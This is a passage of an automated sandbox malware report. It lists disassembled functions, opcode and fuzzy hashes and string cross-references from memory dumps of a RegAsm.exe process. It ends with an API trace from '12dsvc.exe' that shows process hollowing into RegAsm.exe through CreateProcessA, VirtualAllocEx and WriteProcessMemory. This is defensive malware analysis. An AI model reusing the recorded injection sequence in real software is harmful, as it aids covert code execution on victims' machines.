Opcode ID: b3857defd956f771d765e20e51f738e83617c71d6656898c368ccaca443eb4d6
Instruction ID: c81ea08d42f13820bc613b952ce0d7efc88064668f2331bbed2fe1e13d06ac1b
Opcode Fuzzy Hash: b3857defd956f771d765e20e51f738e83617c71d6656898c368ccaca443eb4d6
Instruction Fuzzy Hash: 66D0C2B131041457C6092629B4084AE37DEEAC5621302422AE10AC3B40CE2C280683D5

Function 06B8B7E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2204be5caa8304ffb09b549aab84ab1edfbde7a7900ad3034089102f77b38881
Instruction ID: cd078e7b386c7dc6226913b01045bd6fb1785d524779997460f0bb965f1d33d0
Opcode Fuzzy Hash: 2204be5caa8304ffb09b549aab84ab1edfbde7a7900ad3034089102f77b38881
Instruction Fuzzy Hash: 3CE07E79D0020CFFCB41DFA4E9458DDBBB9EB48200F5082AAD809A3240EA746B959B80

Function 06B8E4D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e8cc9fc67d816b777dd1e3a35cb2cac2526a09e73c2fb8127c3bad5b2da397
Instruction ID: e48c36fe41ef124509f932b55291916ace7f38688c8fa456b9ed8d2cfa8761e3
Opcode Fuzzy Hash: 11e8cc9fc67d816b777dd1e3a35cb2cac2526a09e73c2fb8127c3bad5b2da397
Instruction Fuzzy Hash: C4D017B1A02208FFCB00DFA8EA0599DB7B9EB44214B5045AD9408F7250EA316E049B91

Function 06B8FBAA Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed1f46db36e8656e95809246702d647609b4cf59db5436600ed3c13cedf6697
Instruction ID: 562fbe3238bbe6727102a61f782307059189dee6fafd4e638bcee979be35ae79
Opcode Fuzzy Hash: 8ed1f46db36e8656e95809246702d647609b4cf59db5436600ed3c13cedf6697
Instruction Fuzzy Hash: C3C012B27040514B4345666C705406D7BD7D7DC5A33A9416FD70DD7388DE704C564785

Function 06B83721 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2cde6f1152f01f5339e892e357dae904f4700c330a3e787d54a25a54f5cde8d
Instruction ID: 61e09abb4da108120fe0ddfcf2d50bde175a612973ddd2ceb42f35e7db537b2e
Opcode Fuzzy Hash: f2cde6f1152f01f5339e892e357dae904f4700c330a3e787d54a25a54f5cde8d
Instruction Fuzzy Hash: 1FC08C3000A3803FCB026624AD02DE77F6BAB56B00F0A0182F3818A0A383650A38D3B3

Function 06B8EBC7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 481a2db332d2d97e415deb3d9142c543a57b2278892c25b27d94b66415f1620a
Instruction ID: 5b0fad79d7fb0ad5f27af8045e00f93c75541c103c367e79f2586879260d2397
Opcode Fuzzy Hash: 481a2db332d2d97e415deb3d9142c543a57b2278892c25b27d94b66415f1620a
Instruction Fuzzy Hash: 89C01235210108EFC740DF54D440C943B79BF487107404085F5444F631C732E810DB50

Function 06B8EBC8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf81d6e8626c98955923d90005f7ec899d15137b314f5ea82be49f64a0b67b62
Instruction ID: 9fe68578960da7fa5beda8faa40f395ae2f4455b935a7dd9edeae13dbd261aa1
Opcode Fuzzy Hash: bf81d6e8626c98955923d90005f7ec899d15137b314f5ea82be49f64a0b67b62
Instruction Fuzzy Hash: 3AC00236260208EFCB41EF99D844C557BB9BF59B147509099FA454F631C732E921EB50

Non-executed Functions

Function 06E42E88 Relevance: 2.7, Strings: 2, Instructions: 202COMMON

Download Yara Rule

Strings

$]q, xrefs: 06E42F7B
$]q, xrefs: 06E43039

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 69ae5b4d50773570137f9ada01991f14b7b941923261e50cb2b50fde3abfd697
Instruction ID: ba67d5d987b7938b757b5525c6790ce758e52998d053feb4f1f511f84c253fb1
Opcode Fuzzy Hash: 69ae5b4d50773570137f9ada01991f14b7b941923261e50cb2b50fde3abfd697
Instruction Fuzzy Hash: E061CE74E00208DFDB54DFA9D880ADDBBB2BF89300F64912AE505BB364DB35A946CF50

Function 06E46A90 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\VOi, xrefs: 06E46CDB

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: \VOi
API String ID: 0-2334242610
Opcode ID: 1caf293d45321b1c153875d91a4638dc1736799c408c037f6e3d2312a83bfd5f
Instruction ID: 3aa93ebe79f4c642da436276e7c0a32d8fea54111471d530ea330fbc50911c57
Opcode Fuzzy Hash: 1caf293d45321b1c153875d91a4638dc1736799c408c037f6e3d2312a83bfd5f
Instruction Fuzzy Hash: 19917CB0E003098FDF54EFB9D99179DBBF2AF89308F249529E414AB254EB749845CB81

Function 06B86FE8 Relevance: .8, Instructions: 786COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6fafd576f1ff700020abe0f2390098c6e4a1a32a93dfbb372acff3aaa83452
Instruction ID: 208e86120f5743416d630e937759e7c66485bf8b008ba392513ed2e1c0af2ea8
Opcode Fuzzy Hash: 4d6fafd576f1ff700020abe0f2390098c6e4a1a32a93dfbb372acff3aaa83452
Instruction Fuzzy Hash: D76220F06002019FD749EF19D55471A7ADAEF95308F24C46C810E8F3A6DBBAD90BCB96

Function 06B86FF8 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851d40a8d20af4b872c8f7cab5ae0218e29137ecc4cfbb8ccb016ca90509451f
Instruction ID: 7732004c3308dc7b642819233e70c6d16fe5359c9a6c06c52a1b51125f2a89fa
Opcode Fuzzy Hash: 851d40a8d20af4b872c8f7cab5ae0218e29137ecc4cfbb8ccb016ca90509451f
Instruction Fuzzy Hash: 076221F06002019FD749EF19D55471A7ADAEF95308F24C46C810E8F3A6DBBAD90BCB96

Function 05870040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b362d124e119e9dcf25011851e51a2543b953b5a8695853b4e9a4454309e9ea0
Instruction ID: 3d6561de67538cb81a199fc47da9a1a2c2151b421ea78ffef00c430eb0c915be
Opcode Fuzzy Hash: b362d124e119e9dcf25011851e51a2543b953b5a8695853b4e9a4454309e9ea0
Instruction Fuzzy Hash: A81291B04127468EE320EF65FC4C1A97BB9BB86318F904609D2656F2F9DBBC154ACF44

Function 015ADC74 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0584a9f76718e2ae56ba303c19f66cb0abdf52d6660865605d22e9c3fe12708a
Instruction ID: 22a2d49ae73295cc2f64ea0ddb47a4f257b7beeb0876c57af99aed89c78a24f7
Opcode Fuzzy Hash: 0584a9f76718e2ae56ba303c19f66cb0abdf52d6660865605d22e9c3fe12708a
Instruction Fuzzy Hash: 6CA16D32E4020A8FCF05DFB8C84459EBBB6FFC4300B55456AE906AF265DB75E945CB80

Function 05870007 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2951232791.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b8bfc99e95d0509c26451d8a52cb7e5ccbf703a5834974e6a7f7f1549106f8
Instruction ID: 6b4ebe5bdc709c8afffc184457e5a5f479825e6ca6a13cf890c67b962a31c088
Opcode Fuzzy Hash: c5b8bfc99e95d0509c26451d8a52cb7e5ccbf703a5834974e6a7f7f1549106f8
Instruction Fuzzy Hash: 2FD125B04127468FD720EF28EC481997BB9BB87328F654619D1616F2F9DBBC148ACF44

Function 06E4CE12 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e619aba7cba30667229da6692cecefe18e7e6e0fa8910a2b0e1760b3ea1166df
Instruction ID: cdb3b6252f64e0b0a1c7aac1827cae571377b5bedb08d524904a9ee50be63d2f
Opcode Fuzzy Hash: e619aba7cba30667229da6692cecefe18e7e6e0fa8910a2b0e1760b3ea1166df
Instruction Fuzzy Hash: AF91B470E01229CFDB68DFA5C950B9EBBB2BF89300F5081AAC509AB254DB355E85CF51

Function 06E43158 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5726f308d317347083b94574f1c3d60a3f8d951742f5dbafde40792db6a4fe7b
Instruction ID: e1c8eabe53978667579cf4677fc25fe2d436bea0d1e9a0e9c0612b06420b5351
Opcode Fuzzy Hash: 5726f308d317347083b94574f1c3d60a3f8d951742f5dbafde40792db6a4fe7b
Instruction Fuzzy Hash: 12017834E05308CFCB11DFA4E8409EDB7B0FB4A312F106296E41AAB2A2C3319D55CF90

Function 06E4ACB3 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57fe4e398414cd84f4a4f82b10bc1f434e9073549e304661c7ce17a33822a0ee
Instruction ID: b301d5db183a16b24a9974305d70fe8c279df19057b930ee7445696c7a6e7f2b
Opcode Fuzzy Hash: 57fe4e398414cd84f4a4f82b10bc1f434e9073549e304661c7ce17a33822a0ee
Instruction Fuzzy Hash: 54E09B30C8620EDEE7549F75D0117FFF6306B41218F106455840677248CB7046458F97

Function 06E4CD6C Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0109d334d6b8801abc6adfb55fcfd8e6a800713f463e589e2c36bdc1f3a73026
Instruction ID: 99466191288b901c421e2bae64000d72c965990fbd3e404ca5c0fffb3e066fac
Opcode Fuzzy Hash: 0109d334d6b8801abc6adfb55fcfd8e6a800713f463e589e2c36bdc1f3a73026
Instruction Fuzzy Hash: 22F0A570C86219CEEB64AF64E8487FABE70AB46B09F206055D01677290C7B44684DFC4

Function 06B8E587 Relevance: 46.6, Strings: 37, Instructions: 391COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8E8A3
D}i, xrefs: 06B8E65D
D}i, xrefs: 06B8E5C9
D}i, xrefs: 06B8E613
D}i, xrefs: 06B8E6A7
D}i, xrefs: 06B8E803
D}i, xrefs: 06B8E8F0
D}i, xrefs: 06B8E6F1
D}i, xrefs: 06B8E8C8
D}i, xrefs: 06B8E990
D}i, xrefs: 06B8E940
D}i, xrefs: 06B8EAD9
D}i, xrefs: 06B8E763
D}i, xrefs: 06B8E9B8
D}i, xrefs: 06B8E682
D}i, xrefs: 06B8E716
D}i, xrefs: 06B8EA08
D}i, xrefs: 06B8EAAE
D}i, xrefs: 06B8E638
D}i, xrefs: 06B8EA83
D}i, xrefs: 06B8E7DB
D}i, xrefs: 06B8E73B
D}i, xrefs: 06B8E5EE
D}i, xrefs: 06B8EB04
D}i, xrefs: 06B8E78B
D}i, xrefs: 06B8E968
D}i, xrefs: 06B8EA58
D}i, xrefs: 06B8E7B3
D}i, xrefs: 06B8E82B
D}i, xrefs: 06B8E918
D}i, xrefs: 06B8E87B
D}i, xrefs: 06B8E5A4
D}i, xrefs: 06B8EA30
D}i, xrefs: 06B8E6CC
D}i, xrefs: 06B8EB2F
D}i, xrefs: 06B8E9E0
D}i, xrefs: 06B8E853

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-626374656
Opcode ID: e1eb63b311e66caeeaf085698b53c1aeeaea61af922102c8140ef8ecfda7faf9
Instruction ID: edb4d38bc608797192d8322f258047cf110696e5f39d511e130873400d7e474a
Opcode Fuzzy Hash: e1eb63b311e66caeeaf085698b53c1aeeaea61af922102c8140ef8ecfda7faf9
Instruction Fuzzy Hash: B0D1A1703006036BE206AAB9A951E7DA65BFFD5700B44883DC1198F7A9DF756C1E83C7

Function 06B8E598 Relevance: 46.6, Strings: 37, Instructions: 383COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8E8A3
D}i, xrefs: 06B8E65D
D}i, xrefs: 06B8E5C9
D}i, xrefs: 06B8E613
D}i, xrefs: 06B8E6A7
D}i, xrefs: 06B8E803
D}i, xrefs: 06B8E8F0
D}i, xrefs: 06B8E6F1
D}i, xrefs: 06B8E8C8
D}i, xrefs: 06B8E990
D}i, xrefs: 06B8E940
D}i, xrefs: 06B8EAD9
D}i, xrefs: 06B8E763
D}i, xrefs: 06B8E9B8
D}i, xrefs: 06B8E682
D}i, xrefs: 06B8E716
D}i, xrefs: 06B8EA08
D}i, xrefs: 06B8EAAE
D}i, xrefs: 06B8E638
D}i, xrefs: 06B8EA83
D}i, xrefs: 06B8E7DB
D}i, xrefs: 06B8E73B
D}i, xrefs: 06B8E5EE
D}i, xrefs: 06B8EB04
D}i, xrefs: 06B8E78B
D}i, xrefs: 06B8E968
D}i, xrefs: 06B8EA58
D}i, xrefs: 06B8E7B3
D}i, xrefs: 06B8E82B
D}i, xrefs: 06B8E918
D}i, xrefs: 06B8E87B
D}i, xrefs: 06B8E5A4
D}i, xrefs: 06B8EA30
D}i, xrefs: 06B8E6CC
D}i, xrefs: 06B8EB2F
D}i, xrefs: 06B8E9E0
D}i, xrefs: 06B8E853

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-626374656
Opcode ID: 54ff750a03c0e38b98cd4c3048c07edca121687ba9fee36243062af73cba8183
Instruction ID: 8002346905c95b704ad214c0063e402000e08a10cd52956bae82ac6d71dfcc8a
Opcode Fuzzy Hash: 54ff750a03c0e38b98cd4c3048c07edca121687ba9fee36243062af73cba8183
Instruction Fuzzy Hash: BCD1AE303006036BE20AAABAA951E7DA55BFFD5704B44883DC1198F7A8DF756C1E83C7

Function 06B8CF57 Relevance: 16.4, Strings: 13, Instructions: 150COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8D0C1
D}i, xrefs: 06B8D09C
D}i, xrefs: 06B8D077
D}i, xrefs: 06B8D052
D}i, xrefs: 06B8D02D
D}i, xrefs: 06B8D008
D}i, xrefs: 06B8D0E6
D}i, xrefs: 06B8CFBE
D}i, xrefs: 06B8D130
D}i, xrefs: 06B8CF99
D}i, xrefs: 06B8CF74
D}i, xrefs: 06B8CFE3
D}i, xrefs: 06B8D10B

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1209774835
Opcode ID: 168d33c869e0716e3e5d8cab239bd6b7974a8e89c5fb15f436b17a9b3b4a32dc
Instruction ID: 60152f3b1bf4bd856518cb19c3ba1f962fc8ba1cf6af2d9a60e66809474c1ccb
Opcode Fuzzy Hash: 168d33c869e0716e3e5d8cab239bd6b7974a8e89c5fb15f436b17a9b3b4a32dc
Instruction Fuzzy Hash: CA41D9703002032BE3066AB9A951E3DA65EFFD5600B40493DD20D8F6A9DF796D1E83DB

Function 06B8CF68 Relevance: 16.4, Strings: 13, Instructions: 143COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8D0C1
D}i, xrefs: 06B8D09C
D}i, xrefs: 06B8D077
D}i, xrefs: 06B8D052
D}i, xrefs: 06B8D02D
D}i, xrefs: 06B8D008
D}i, xrefs: 06B8D0E6
D}i, xrefs: 06B8CFBE
D}i, xrefs: 06B8D130
D}i, xrefs: 06B8CF99
D}i, xrefs: 06B8CF74
D}i, xrefs: 06B8CFE3
D}i, xrefs: 06B8D10B

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1209774835
Opcode ID: a4736636e3e4d71143232adb04f0cb0afb041d781125bef8922afcb923525189
Instruction ID: 3bfcb26f51be79a6ea32a696090bbbe9bfcfc97368a96216ca468d69cec319ef
Opcode Fuzzy Hash: a4736636e3e4d71143232adb04f0cb0afb041d781125bef8922afcb923525189
Instruction Fuzzy Hash: C841C6703006032BE206AAB9A951E3DA55EFFD5700B40893DD20D8F6A9CF796D1D83DB

Function 06B8D1A9 Relevance: 10.1, Strings: 8, Instructions: 103COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8D258
D}i, xrefs: 06B8D1E9
D}i, xrefs: 06B8D2C7
D}i, xrefs: 06B8D27D
D}i, xrefs: 06B8D20E
D}i, xrefs: 06B8D1C4
D}i, xrefs: 06B8D2A2
D}i, xrefs: 06B8D233

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1477724378
Opcode ID: 1dced376082c4adcf8f030f84e6383066e1ecd7e7079271f5f97b5fa2c1d7544
Instruction ID: 3097c54948c4bce1a0e3197ba93d72e2dfe5a1a431bf83dcbec902a791e9b652
Opcode Fuzzy Hash: 1dced376082c4adcf8f030f84e6383066e1ecd7e7079271f5f97b5fa2c1d7544
Instruction Fuzzy Hash: EB31D6703002032BE2065AB9A941A7DAA5EFFD5604B40493DD10D8F6A9CF756C5E83DB

Function 06B8D1B8 Relevance: 10.1, Strings: 8, Instructions: 93COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8D258
D}i, xrefs: 06B8D1E9
D}i, xrefs: 06B8D2C7
D}i, xrefs: 06B8D27D
D}i, xrefs: 06B8D20E
D}i, xrefs: 06B8D1C4
D}i, xrefs: 06B8D2A2
D}i, xrefs: 06B8D233

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-1477724378
Opcode ID: e712d968d318e9f15bbb6c3305a9dbae7296ea6686893485159699cbf2c69c95
Instruction ID: 2d5a3e2b3714a9171b83f881e3755f00a8b28ceda5bb8bbb0bb5045b2516d711
Opcode Fuzzy Hash: e712d968d318e9f15bbb6c3305a9dbae7296ea6686893485159699cbf2c69c95
Instruction Fuzzy Hash: 5421B8703002032BE606AAA9A941E3DA65EFFD5704B40493DD20D8F6ADCF756C5D83DB

Function 06B8CC40 Relevance: 8.8, Strings: 7, Instructions: 88COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8CD29
D}i, xrefs: 06B8CC5C
D}i, xrefs: 06B8CD52
D}i, xrefs: 06B8CC85
D}i, xrefs: 06B8CD00
D}i, xrefs: 06B8CCAE
D}i, xrefs: 06B8CCD7

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3632686342
Opcode ID: d95364d3b777fb2fa2d9ca21d6c6f6abf2050ed2d877a6eb63574004ee1b4b1d
Instruction ID: 0098c14a82a77d22d930b6d598b92414c47e382c7a7137d04c3d4afc1d601ee2
Opcode Fuzzy Hash: d95364d3b777fb2fa2d9ca21d6c6f6abf2050ed2d877a6eb63574004ee1b4b1d
Instruction Fuzzy Hash: 9531F4303012836BEB061BA5AD4587DBB2AFF96700740413CD10A8FAA8CE745D5FC782

Function 06B8CC50 Relevance: 8.8, Strings: 7, Instructions: 83COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8CD29
D}i, xrefs: 06B8CC5C
D}i, xrefs: 06B8CD52
D}i, xrefs: 06B8CC85
D}i, xrefs: 06B8CD00
D}i, xrefs: 06B8CCAE
D}i, xrefs: 06B8CCD7

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3632686342
Opcode ID: d7131e72c4e2e35afcd6ab963f89cba0c1fd0ed109fe00277fc04e8d17b5dca1
Instruction ID: 40d77407bca8f7a828fa41e02aebc9980a52364db606c861a2d2de01b87fd748
Opcode Fuzzy Hash: d7131e72c4e2e35afcd6ab963f89cba0c1fd0ed109fe00277fc04e8d17b5dca1
Instruction Fuzzy Hash: 6F21A230300287ABEB062BA6E94587DBB5AFF95700740453CD10A8F6A8CE745D5FCB86

Function 06B8D7F8 Relevance: 7.6, Strings: 6, Instructions: 81COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8D8A8
D}i, xrefs: 06B8D8CD
D}i, xrefs: 06B8D814
D}i, xrefs: 06B8D839
D}i, xrefs: 06B8D883
D}i, xrefs: 06B8D85E

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3147682437
Opcode ID: 2f7e2bd094dafd7ec89a235ce0c997539703621dc30e3a475c06a467bdaf3a6e
Instruction ID: 5b020f50c06d9f2db34e78ee759f361b5e2e5775b28fa13b530656fd5d8fe8fd
Opcode Fuzzy Hash: 2f7e2bd094dafd7ec89a235ce0c997539703621dc30e3a475c06a467bdaf3a6e
Instruction Fuzzy Hash: 4321C7303002432BE3066AAAA951E7DAB5EFF95A04B44493DD1098F699CF755C2E83D7

Function 06B8D808 Relevance: 7.6, Strings: 6, Instructions: 73COMMON

Download Yara Rule

Strings

D}i, xrefs: 06B8D8A8
D}i, xrefs: 06B8D8CD
D}i, xrefs: 06B8D814
D}i, xrefs: 06B8D839
D}i, xrefs: 06B8D883
D}i, xrefs: 06B8D85E

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: D}i$D}i$D}i$D}i$D}i$D}i
API String ID: 0-3147682437
Opcode ID: 191b14e2d5623b2a6b7a31278a72b1b385937d3f22b085a30360b20320e0666c
Instruction ID: b4a8f0494ae2c4564190a03211ab720bdcac573010953c0661f3444c1f3bc373
Opcode Fuzzy Hash: 191b14e2d5623b2a6b7a31278a72b1b385937d3f22b085a30360b20320e0666c
Instruction Fuzzy Hash: 6D11C6303402432BE2066AAAA941E3DA65FFFD5704B408A3DD10D8F698CF766D5D83D7

Analysis Process: 12dsvc.exePID: 3724, Parent PID: 5632COMMON

Execution Graph

Execution Coverage:	36.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03002191 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03002103,030020F3), ref: 03002300
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03002313
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 03002331
ReadProcessMemory.KERNELBASE(00000098,?,03002147,00000004,00000000), ref: 03002355
VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 03002380
WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 030023D8
WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 03002423
WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 03002461
